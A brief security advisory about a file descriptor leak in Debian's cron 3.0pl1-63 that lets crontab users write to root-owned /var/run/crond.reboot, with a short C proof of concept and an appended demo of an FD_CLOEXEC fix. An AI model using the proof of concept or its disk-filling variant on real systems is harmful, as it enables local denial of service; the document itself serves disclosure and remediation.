Vulnerability

    cron

Affected

    cron 3.0.pl1-63

Description

    Matthew Toseland found the following. This appears to be
    Debian-specific. How to exploit, other than DoS attacks/quota
    bypass? What does /var/run/crond.reboot do?

    Matthew has discovered a problem with cron 3.0pl1-63 in woody.
    It does not close /var/run/crond.reboot when it forks and setuids.
    So any user who has a crontab can write to /var/run/crond.reboot,
    which is created with permissions 0000 and user/group root/root.
    This may or may not be exploitable for elevated privilege, but at
    the very least it could be a quota violation or similar, leading to
    a local DoS of the /var filesystem, hence disabling logging, mail,
    restarting of system daemons... on most systems. Note that this
    only works if there is a /var/run/crond.reboot. Sample code:

    #include <stdio.h>
    #include <string.h>   /* strlen */
    #include <unistd.h>

    int main(void)
    {
        char *p = "hahahahahahahahahahahahahahahahahahahaha\n";
        int x = strlen(p);

        /* descriptor 6 is taken to be the crond.reboot descriptor
           that the job inherits from cron */
        write(6, p, x - 1);
        close(6);
        return 0;
    }

    Compile and insert into your crontab. The DoS variant is obvious.

Solution

    BTW, this is fixed now and appears to be Debian-specific.
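The descriptor leak described above, next to one common way to prevent it, as an added example that is not part of the original advisory or of cron's source. The function name, the temporary file standing in for /var/run/crond.reboot, and the choice of FD_CLOEXEC as the fix are assumptions; the advisory does not say how Debian fixed it.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

/* Models a daemon that opens a state file, then forks and execs a user job.
 * Returns the bytes the job wrote through the inherited descriptor
 * (>0: descriptor leaked, 0: not reachable from the job, -1: setup error). */
long bytes_written_by_job(int harden)
{
    char path[] = "/tmp/fdleak-demo-XXXXXX"; /* constructed stand-in for crond.reboot */
    char job[64];
    struct stat st;
    pid_t pid;
    long n = -1;
    int fd = mkstemp(path);

    if (fd < 0)
        return -1;
    /* sh redirections need a one-digit fd; mode 0000 mirrors the advisory and
     * shows that file permissions are only checked at open() time. */
    if (fd > 9 || fchmod(fd, 0) == -1)
        goto out;
    /* Hardened variant: the kernel drops the descriptor at exec. */
    if (harden && fcntl(fd, F_SETFD, FD_CLOEXEC) == -1)
        goto out;

    /* The "user job" writes to the descriptor number it inherited. */
    snprintf(job, sizeof job, "exec 2>/dev/null; echo leaked >&%d", fd);
    pid = fork();
    if (pid == 0) {
        /* cron would setuid() to the crontab owner here before running the job */
        execl("/bin/sh", "sh", "-c", job, (char *)NULL);
        _exit(127);
    }
    if (pid > 0 && waitpid(pid, NULL, 0) == pid && fstat(fd, &st) == 0)
        n = (long)st.st_size;
out:
    close(fd);
    unlink(path);
    return n;
}

int main(void)
{
    printf("without FD_CLOEXEC: job wrote %ld bytes\n", bytes_written_by_job(0));
    printf("with FD_CLOEXEC:    job wrote %ld bytes\n", bytes_written_by_job(1));
    return 0;
}
```

Closing the descriptor explicitly in the child between fork() and exec has the same effect; opening the file with O_CLOEXEC avoids the window between open() and fcntl().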